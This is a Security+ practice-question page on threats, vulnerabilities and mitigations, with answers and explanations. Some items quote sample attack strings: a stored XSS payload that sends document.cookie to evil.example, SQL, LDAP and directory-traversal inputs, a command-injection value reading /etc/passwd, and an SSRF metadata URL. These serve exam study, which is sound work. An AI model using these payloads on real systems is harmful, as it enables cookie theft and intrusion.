Skip to content

Domain 2.0 — Threats, Vulnerabilities, and Mitigations

← Back to Security+ overview · Domain weight: 22%

Q019. Phishing vs spear phishing

An attacker sends a tailored email to the CFO referencing a recent acquisition and asking for urgent wire-transfer approval. What is this?

  • A. Spear phishing
  • B. Pharming
  • C. Smishing
  • D. Dumpster diving

Answer: A — Spear phishing

Why: It is targeted and personalized. Generic phishing is broader; smishing uses SMS; pharming redirects users to fraudulent sites.


Q020. Whaling

A phishing campaign targets only senior executives with customized legal-document lures. What is the best label?

  • A. Whaling
  • B. Watering hole
  • C. Tailgating
  • D. Evil twin

Answer: A — Whaling

Why: Whaling is phishing targeted at high-value executives or senior leaders.


Q021. Smishing

Users receive text messages claiming their bank account is locked and asking them to click a link. What attack vector is this?

  • A. Vishing
  • B. Smishing
  • C. Prepending
  • D. Invoice fraud

Answer: B — Smishing

Why: Smishing is phishing over SMS/text messaging.


Q022. Vishing

An attacker calls the help desk pretending to be an employee and asks for a password reset. What is the most precise term?

  • A. Vishing
  • B. Typosquatting
  • C. SQL injection
  • D. Credential stuffing

Answer: A — Vishing

Why: Vishing is voice-based phishing/social engineering.


Q023. Watering-hole attack

Employees of a defense contractor are compromised after visiting a small industry association website that attackers infected with malware. What attack is this?

  • A. Watering-hole attack
  • B. Brute-force attack
  • C. Bluejacking
  • D. Pass-the-hash

Answer: A — Watering-hole attack

Why: Attackers compromise a site commonly visited by the intended victims.


Q024. Credential stuffing

A login portal receives thousands of attempts using username/password pairs from unrelated public breaches. Which attack is occurring?

  • A. Password spraying
  • B. Credential stuffing
  • C. Dictionary attack
  • D. Kerberoasting

Answer: B — Credential stuffing

Why: Credential stuffing uses known breached credentials against other services.


Q025. Password spraying

An attacker tries Spring2026! against thousands of accounts and waits between attempts to avoid lockouts. What is this?

  • A. Password spraying
  • B. Credential stuffing
  • C. Rainbow-table attack
  • D. Session fixation

Answer: A — Password spraying

Why: Password spraying uses one or a few common passwords across many accounts.


Q026. Brute force mitigation

Which control most directly reduces the risk of online password brute forcing?

  • A. Account lockout or rate limiting
  • B. File integrity monitoring
  • C. Disk encryption
  • D. Log normalization

Answer: A — Account lockout or rate limiting

Why: Online guessing attacks are slowed or blocked by rate limits, lockouts, and adaptive authentication.


Q027. SQL injection indicator

A web server log shows this request: /product?id=10 OR 1=1--. What vulnerability is likely being tested?

  • A. SQL injection
  • B. XML external entity injection
  • C. Cross-site request forgery
  • D. Directory traversal

Answer: A — SQL injection

Why: The input attempts to alter SQL logic so the condition always evaluates true.


Q028. XSS

A comment field stores <script>fetch('https://evil.example/c?'+document.cookie)</script> and runs it for every visitor. What is this?

  • A. Stored cross-site scripting
  • B. Reflected cross-site scripting
  • C. SQL injection
  • D. LDAP injection

Answer: A — Stored cross-site scripting

Why: The malicious script is saved by the application and later served to other users.


Q029. CSRF

A user who is already logged into a banking site visits a malicious page that silently submits a transfer request to the bank. What attack is this?

  • A. Cross-site request forgery
  • B. Cross-site scripting
  • C. DNS poisoning
  • D. Directory traversal

Answer: A — Cross-site request forgery

Why: CSRF abuses the victim's existing authenticated session to submit an unwanted action.


Q030. Directory traversal

A request contains ../../../../etc/passwd. What type of attack is being attempted?

  • A. Directory traversal
  • B. Race condition
  • C. Buffer overflow
  • D. ARP poisoning

Answer: A — Directory traversal

Why: The attacker is trying to escape the intended web directory and access filesystem paths.


Q031. Race condition

Two transactions withdraw money at the same time and both pass the balance check before either updates the account. What vulnerability class is this?

  • A. Race condition
  • B. Integer overflow
  • C. Reflected XSS
  • D. DNS tunneling

Answer: A — Race condition

Why: System behavior depends on timing between operations, allowing state checks to be bypassed.


Q032. Buffer overflow

A program crashes when a user supplies input much longer than expected, and the instruction pointer is overwritten. What vulnerability is likely present?

  • A. Buffer overflow
  • B. CSRF
  • C. SSRF
  • D. Insecure deserialization

Answer: A — Buffer overflow

Why: Excess input overwrites adjacent memory, potentially allowing code execution.


Q033. Insecure deserialization

An application accepts a serialized object from a user and instantiates it without validation, resulting in remote code execution. What vulnerability is this?

  • A. Insecure deserialization
  • B. Clickjacking
  • C. Password spraying
  • D. MAC flooding

Answer: A — Insecure deserialization

Why: Untrusted serialized data can manipulate object creation and application logic.


Q034. SSRF

A cloud metadata service is reachable only from inside an instance. An attacker abuses a web app's URL-fetch feature to request http://169.254.169.254/. What is this?

  • A. Server-side request forgery
  • B. Client-side request forgery
  • C. Typosquatting
  • D. DNSSEC bypass

Answer: A — Server-side request forgery

Why: The attacker causes the server to make a request to an internal or privileged endpoint.


Q035. Evil twin

Users connect to a rogue wireless network named the same as the corporate SSID. The attacker captures login attempts. What is this?

  • A. Evil twin
  • B. Jamming
  • C. Bluebugging
  • D. On-path attack only

Answer: A — Evil twin

Why: An evil twin is a malicious wireless access point impersonating a legitimate SSID.


Q036. On-path attack

An attacker intercepts and modifies traffic between a client and a server while both believe they are communicating directly. What attack is this?

  • A. On-path attack
  • B. Watering-hole attack
  • C. Supply-chain attack
  • D. Logic bomb

Answer: A — On-path attack

Why: Formerly called man-in-the-middle, this attack places the attacker in the communication path.


Q037. DNS poisoning

Users type the correct domain but are sent to a fake IP address due to corrupted resolver cache entries. What attack is this?

  • A. DNS poisoning
  • B. ARP spoofing
  • C. BGP route summarization
  • D. DHCP starvation

Answer: A — DNS poisoning

Why: DNS cache/resolution data has been manipulated to redirect users.


Q038. ARP spoofing

A host on a LAN sends fake ARP replies claiming the default gateway's IP address maps to the attacker's MAC address. What is this?

  • A. ARP poisoning
  • B. DNSSEC validation
  • C. VLAN hopping
  • D. Deauthentication

Answer: A — ARP poisoning

Why: ARP poisoning manipulates local IP-to-MAC resolution.


Q039. Supply-chain attack

A trusted software vendor's update server is compromised and distributes signed malware to customers. What attack category is this?

  • A. Supply-chain attack
  • B. Credential stuffing
  • C. Shoulder surfing
  • D. Pharming

Answer: A — Supply-chain attack

Why: The attacker compromises a trusted supplier path rather than attacking each victim directly.


Q040. Zero-day

A vulnerability is actively exploited before the vendor has released a patch. What is it called?

  • A. Zero-day
  • B. Legacy system
  • C. End-of-life software
  • D. CVSS environmental score

Answer: A — Zero-day

Why: A zero-day is exploited before a fix is available or widely known.


Q041. Vulnerability vs threat

An unpatched OpenSSL library exists on a server. What is this best described as?

  • A. Vulnerability
  • B. Threat actor
  • C. Risk acceptance
  • D. Exposure factor

Answer: A — Vulnerability

Why: A vulnerability is a weakness. The attacker is the threat actor; business impact probability is risk.


Q042. Threat actor motivation

A criminal group encrypts company data and demands cryptocurrency payment. What is the primary motivation?

  • A. Financial gain
  • B. Espionage
  • C. Ideology
  • D. Mischief only

Answer: A — Financial gain

Why: Ransomware crews are usually financially motivated.


Q043. APT

A nation-state group spends months maintaining stealthy access to steal research data. What label best fits?

  • A. Advanced persistent threat
  • B. Insider threat only
  • C. Script kiddie
  • D. Hacktivist

Answer: A — Advanced persistent threat

Why: APTs are typically skilled, resourced, stealthy, and persistent.


Q044. Insider threat

A disgruntled employee exports customer records before resigning. What threat category is this?

  • A. Insider threat
  • B. Logic bomb only
  • C. Rogue AP
  • D. Shadow IT

Answer: A — Insider threat

Why: The actor has legitimate internal access and abuses it.


Q045. IoC vs IoA

A file hash associated with known malware is found on a workstation. What is this?

  • A. Indicator of compromise
  • B. Indicator of attack only
  • C. Risk appetite
  • D. Exposure factor

Answer: A — Indicator of compromise

Why: A known malicious artifact on a system is an IoC. IoAs focus more on attacker behavior patterns.


Q046. YARA

A malware analyst wants to search files for known byte patterns and strings associated with a malware family. Which tool/rule type is most appropriate?

  • A. YARA
  • B. CVSS
  • C. SAML
  • D. SCEP

Answer: A — YARA

Why: YARA rules identify malware-like files based on textual or binary patterns.


Q047. CVSS purpose

A vulnerability report lists CVSS base score 9.8. What does the score primarily communicate?

  • A. Technical severity of the vulnerability
  • B. Cost of remediation
  • C. Guaranteed exploitability in this environment
  • D. Legal impact

Answer: A — Technical severity of the vulnerability

Why: CVSS helps rate severity. It does not automatically equal business risk without environmental context.


Q048. Patch management

A critical remote-code-execution vulnerability affects internet-facing VPN appliances. What is the most appropriate mitigation after testing?

  • A. Apply the vendor patch or recommended fix
  • B. Rename the admin account only
  • C. Disable logs
  • D. Increase password length only

Answer: A — Apply the vendor patch or recommended fix

Why: Patching/remediation directly removes or reduces the vulnerable condition.


Q049. Segmentation as mitigation

A flat network allows malware on one workstation to reach database servers directly. Which mitigation best limits lateral movement?

  • A. Network segmentation
  • B. Public DNS
  • C. URL shortening
  • D. Increasing DHCP lease time

Answer: A — Network segmentation

Why: Segmentation limits which systems can communicate and reduces blast radius.


Q050. Input validation

Which control most directly reduces injection vulnerabilities?

  • A. Server-side input validation and parameterized queries
  • B. Longer session timeout
  • C. Larger TLS key size only
  • D. Higher password complexity only

Answer: A — Server-side input validation and parameterized queries

Why: Injection occurs when untrusted input is interpreted as commands or queries. Parameterization separates data from code.


Q051. EDR purpose

A workstation security tool detects suspicious process behavior, isolates the host, and provides timeline data. What tool category is this?

  • A. EDR
  • B. DLP
  • C. CASB
  • D. WAF only

Answer: A — Endpoint detection and response

Why: EDR monitors endpoints for suspicious activity and supports response actions.


Q143. XXE vulnerability

An XML parser fetches external entities and an attacker reads local files through a crafted XML payload. What vulnerability is this?

  • A. XXE
  • B. CSRF
  • C. BGP hijack
  • D. Evil twin

Answer: A — XXE

Why: XML External Entity injection abuses XML parser behavior that resolves external entities. Disable external entity resolution and use hardened parser settings.


Q144. NoSQL injection

A login API accepts JSON and passes user-controlled operators such as "$ne" directly into a MongoDB query. What is the likely issue?

  • A. NoSQL injection
  • B. ARP spoofing
  • C. Password spraying
  • D. Certificate transparency leak

Answer: A — NoSQL injection

Why: NoSQL injection occurs when untrusted input changes the intended query structure or operators. Validate structure and use safe query construction.


Q145. LDAP injection

A web form builds an LDAP filter by concatenating (uid= + input + ). An attacker submits *)(|(uid=*)). What is the vulnerability?

  • A. LDAP injection
  • B. DNS rebinding
  • C. Race condition
  • D. Tokenization failure

Answer: A — LDAP injection

Why: LDAP injection changes the intended directory query. Escape LDAP filter metacharacters and use safe APIs.


Q146. Command injection

A web app runs ping plus a user-supplied hostname through a shell. An attacker enters example.com; cat /etc/passwd. What should be fixed first?

  • A. Avoid shell execution and validate/allowlist arguments
  • B. Disable HTTPS
  • C. Add more CPU
  • D. Use GET instead of POST

Answer: A — Avoid shell execution and validate/allowlist arguments

Why: Command injection happens when untrusted input is interpreted by a shell. Avoid shells, use parameterized process APIs, and validate inputs.


Q147. BOLA/API authorization

An API endpoint /api/v1/invoices/8821 returns another customer's invoice when the numeric ID is changed. Authentication is present. What is missing?

  • A. Object-level authorization check
  • B. TLS
  • C. Password complexity
  • D. Rate limiting only

Answer: A — Object-level authorization check

Why: Broken Object Level Authorization is an API flaw where the service fails to verify the authenticated user is allowed to access the requested object.


Q148. Broken function-level authorization

A normal user changes the URL from /user/export to /admin/exportAll and successfully downloads all records. What is the issue?

  • A. Broken function-level authorization
  • B. Smishing
  • C. DNSSEC failure
  • D. Cipher downgrade only

Answer: A — Broken function-level authorization

Why: The application failed to enforce role/permission checks on a privileged function. Hiding admin links is not authorization.


Q149. JWT alg none

An API accepts a JWT where the header says alg: none and trusts the claims. What is the root problem?

  • A. The verifier failed to enforce expected signing algorithm and signature validation
  • B. The JWT was too short
  • C. The JWT was encrypted
  • D. The user had MFA

Answer: A — The verifier failed to enforce expected signing algorithm and signature validation

Why: JWT validation must enforce allowed algorithms, verify the signature, and validate issuer, audience, expiration, and related claims.


Q150. Session fixation

An attacker sends a victim a link containing a known session ID. After login, the app keeps that same session ID. What attack is this?

  • A. Session fixation
  • B. DNS tunneling
  • C. Kerberoasting
  • D. Clickjacking

Answer: A — Session fixation

Why: Session fixation works when an attacker can force or predict a session identifier that remains valid after authentication. Regenerate session IDs after login.


Q151. Clickjacking defense

A banking site appears inside a transparent iframe on an attacker page, causing users to click hidden buttons. What header helps prevent this?

  • A. Content-Security-Policy frame-ancestors or X-Frame-Options
  • B. MX record
  • C. SPF hardfail
  • D. DHCP snooping

Answer: A — Content-Security-Policy frame-ancestors or X-Frame-Options

Why: Frame restrictions prevent unauthorized embedding and reduce clickjacking risk. CSP frame-ancestors is the modern control.


Q152. CORS misconfiguration

An API returns Access-Control-Allow-Origin: * and Access-Control-Allow-Credentials: true behavior through reflection of arbitrary origins. What is the practical risk?

  • A. A malicious website may read authenticated API responses from a victim browser
  • B. The server will stop using TLS
  • C. DNS records will be poisoned
  • D. NTP will drift

Answer: A — A malicious website may read authenticated API responses from a victim browser

Why: Overly permissive CORS with credentials can let attacker-controlled origins read sensitive browser-authenticated responses.


Q153. HTTP request smuggling

A reverse proxy and backend disagree about whether Content-Length or Transfer-Encoding controls request boundaries. What attack class is likely?

  • A. HTTP request smuggling/desynchronization
  • B. Credential stuffing
  • C. Birthday attack
  • D. Evil twin

Answer: A — HTTP request smuggling/desynchronization

Why: Request smuggling abuses parsing inconsistencies between front-end and back-end servers, often causing one user request to be interpreted as part of another.


Q154. DNS rebinding

A victim visits an attacker site. DNS first resolves to the attacker server, then quickly changes to a private IP so browser requests target an internal admin panel. What is this?

  • A. DNS rebinding
  • B. DNSSEC validation
  • C. Zone transfer
  • D. NXDOMAIN hijack

Answer: A — DNS rebinding

Why: DNS rebinding abuses browser trust and DNS TTL behavior to pivot from a public site into internal network targets.


Q155. BGP hijack impact

Traffic to a public prefix is suddenly routed through an unexpected autonomous system. What is the suspected issue?

  • A. BGP route hijacking/leak
  • B. LDAP injection
  • C. CSRF
  • D. RAID rebuild

Answer: A — BGP route hijacking/leak

Why: BGP hijacks or route leaks misdirect internet traffic by advertising incorrect routes. RPKI/ROA validation can reduce risk.


A user grants a malicious cloud app permission to read mailbox data. No password was stolen. What happened?

  • A. OAuth consent phishing
  • B. ARP spoofing
  • C. SQL injection
  • D. Disk wiping

Answer: A — OAuth consent phishing

Why: OAuth consent phishing tricks users into granting legitimate tokens/scopes to a malicious application. Review app consent and restrict high-risk permissions.


Q157. Device-code phishing

An attacker asks a victim to visit a legitimate Microsoft device-login URL and enter a code. The attacker receives tokens after the victim authenticates. What is this?

  • A. OAuth device-code phishing
  • B. Password spraying
  • C. Golden ticket
  • D. Bluetooth bluesnarfing

Answer: A — OAuth device-code phishing

Why: Device-code phishing abuses a legitimate device authorization flow. The user authenticates to the real provider, but authorizes the attacker's session.


Q158. Kerberoasting

An attacker with a normal domain account requests service tickets for SPNs and attempts offline password cracking. What attack is this?

  • A. Kerberoasting
  • B. ASLR bypass
  • C. Clickjacking
  • D. Typosquatting

Answer: A — Kerberoasting

Why: Kerberoasting targets service account passwords by cracking Kerberos service tickets offline. Use strong service account passwords/gMSA and monitor unusual TGS requests.


Q159. Golden ticket

An attacker obtains the KRBTGT key and forges long-lived Kerberos tickets. What is the attack called?

  • A. Golden ticket
  • B. Pass-the-hash
  • C. Credential stuffing
  • D. DNS tunneling

Answer: A — Golden ticket

Why: Golden tickets are forged TGTs created using the KRBTGT secret. Recovery requires KRBTGT rotation and broad investigation.


Q160. Pass-the-hash versus password cracking

An attacker authenticates to SMB using an NTLM hash without recovering the plaintext password. What attack is this?

  • A. Pass-the-hash
  • B. Rainbow collision
  • C. Credential stuffing
  • D. Watering hole

Answer: A — Pass-the-hash

Why: Pass-the-hash reuses a password hash as an authentication secret in compatible protocols. It does not require cracking the password.


Q161. Living off the land

Malware uses PowerShell, certutil, scheduled tasks, and WMI instead of dropping obvious custom binaries. What tactic does this describe?

  • A. Living off the land
  • B. SQL normalization
  • C. WPA3 transition mode
  • D. Data masking

Answer: A — Living off the land

Why: Living-off-the-land techniques abuse legitimate system tools to blend in and bypass simple allow/deny controls.


Q162. DLL sideloading

A trusted executable loads a malicious DLL from its working directory before the legitimate DLL. What technique is this?

  • A. DLL sideloading/search-order hijacking
  • B. OCSP stapling
  • C. Salting
  • D. Tokenization

Answer: A — DLL sideloading/search-order hijacking

Why: DLL sideloading abuses library search order or placement to make a legitimate process load malicious code.


Q163. Dependency confusion

A build system pulls a public package with the same name as an internal package because the public version number is higher. What is this?

  • A. Dependency confusion
  • B. Certificate pinning
  • C. LDAP bind failure
  • D. Race condition

Answer: A — Dependency confusion

Why: Dependency confusion exploits package manager resolution rules between private and public registries. Pin sources and configure private registries carefully.


Q164. Typosquatting package

A developer installs requestz instead of requests and runs malicious package code. What attack is this?

  • A. Typosquatting
  • B. Bluejacking
  • C. Pass-the-ticket
  • D. CORS preflight

Answer: A — Typosquatting

Why: Typosquatting relies on lookalike package or domain names. Use lockfiles, trusted registries, review package provenance, and scanning.


Q165. SBOM limitation

A vendor provides an SBOM. Which statement is most accurate?

  • A. It lists components and helps vulnerability management, but it does not prove the software is secure
  • B. It guarantees no vulnerabilities exist
  • C. It replaces code signing
  • D. It makes patching unnecessary

Answer: A — It lists components and helps vulnerability management, but it does not prove the software is secure

Why: An SBOM improves visibility into components and dependencies. It is not an assurance certificate or substitute for secure engineering.


Q166. CVE vs CWE

Which pair is correct?

  • A. CVE identifies a specific disclosed vulnerability; CWE classifies a weakness type
  • B. CWE identifies a single affected product version; CVE is a patch file
  • C. CVE is a risk score; CWE is a firewall rule
  • D. CVE and CWE are identical

Answer: A — CVE identifies a specific disclosed vulnerability; CWE classifies a weakness type

Why: CVE records specific vulnerabilities; CWE categorizes common weakness patterns such as SQL injection or buffer overflow.


Q167. CVSS versus EPSS

A vulnerability has high CVSS but low EPSS. What does that generally mean?

  • A. Potential severity is high, but observed/estimated exploit likelihood is low
  • B. The vulnerability is harmless
  • C. The patch is fake
  • D. It only affects printers

Answer: A — Potential severity is high, but observed/estimated exploit likelihood is low

Why: CVSS estimates technical severity. EPSS (FIRST.org's Exploit Prediction Scoring System) estimates probability of exploitation. Good prioritization considers both plus asset exposure. EPSS is not itself a named SY0-701 objective term, but the CVSS-vs-likelihood distinction it illustrates is.


Q168. Virtual patching

A critical web flaw cannot be fixed in the app for two weeks. A WAF rule blocks the exploit pattern temporarily. What is this called?

  • A. Virtual patching
  • B. Hashing
  • C. Legal hold
  • D. Token replay

Answer: A — Virtual patching

Why: Virtual patching adds a compensating control to reduce exploitability until the underlying software is fixed.


Q169. Web shell indicator

Which event most strongly suggests a web shell on a Linux web server?

  • A. The web server process spawns /bin/sh and connects outbound to an unfamiliar IP
  • B. A cron job rotates logs
  • C. NTP sync succeeds
  • D. A certificate renews

Answer: A — The web server process spawns /bin/sh and connects outbound to an unfamiliar IP

Why: Web shells often cause web worker processes to execute shells or system commands and may create unusual outbound connections.


Q170. DNS tunneling

A host makes thousands of long, high-entropy subdomain queries to a domain it has never used before. What should analysts suspect?

  • A. DNS tunneling or data exfiltration
  • B. DHCP exhaustion only
  • C. Certificate transparency
  • D. WPA handshake capture

Answer: A — DNS tunneling or data exfiltration

Why: DNS tunneling often produces unusual query volume, long labels, high entropy, and suspicious authoritative domains.


Q171. BEC control

A CFO receives a realistic vendor-bank-change request from a compromised supplier mailbox. Which control best reduces loss?

  • A. Out-of-band verification of payment changes using a known trusted contact path
  • B. More complex Wi-Fi password
  • C. Faster disk encryption
  • D. Turning off logging

Answer: A — Out-of-band verification of payment changes using a known trusted contact path

Why: Business email compromise often abuses legitimate mailboxes and social engineering. Payment-change verification through known channels is key.


Q172. Resource exhaustion API abuse

An unauthenticated API endpoint performs expensive searches and an attacker sends many broad queries, driving up CPU and cloud cost. Which control is most direct?

  • A. Rate limits, quotas, authentication, and bounded query cost
  • B. Disable certificate validation
  • C. Use longer passwords
  • D. Turn off backups

Answer: A — Rate limits, quotas, authentication, and bounded query cost

Why: API resource consumption risk is reduced with rate limiting, quotas, auth, input bounds, caching, and cost-aware query controls.


← Domain 1 · Back to Security+ overview · Next: Domain 3 — Security Architecture →